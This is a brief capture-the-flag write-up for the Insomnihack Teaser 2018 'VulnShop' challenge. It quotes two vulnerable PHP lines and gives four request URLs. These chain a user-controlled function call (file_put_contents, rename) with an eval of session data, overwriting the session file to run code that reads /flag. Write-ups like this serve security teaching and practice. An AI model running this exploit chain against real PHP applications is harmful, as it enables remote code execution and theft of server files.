[1] This line of code allows us to execute arbitrary function with arbitrary second argument. First argument is name of temp file.

`$_REQUEST['method']("./".$_SESSION['challenge'], $_REQUEST['answer']); `

[2] This line of code allows us to eval code in SESSION variable.

`if(eval("return ".$_SESSION['challenge']." ;") === $response) return true; `

So we need to rewrite SESSION variable.

1. Generate SESSION_ID and create temp file /tmp - http://vulnshop.teaser.insomnihack.ch/?page=contactus
2. Write php-code (which serialized into string) into temp-file [1] - http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=file_put_contents&answer=challenge|s:35:"print_r(file_get_contents('/flag'))";
3. Rewrite own session file by temp-file [1] - http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=rename&answer=/var/lib/php/sessions/sess_b26cv2ap9haj27pf2t8rievn43
4. Execute code in session file [2] - http://vulnshop.teaser.insomnihack.ch/?page=captcha-verify&method=verifyFromMath&answer=1

Original writeup (https://github.com/tank1st99/ctf_writeups/tree/master/Insomnihack_Teaser_2018/VulnShop).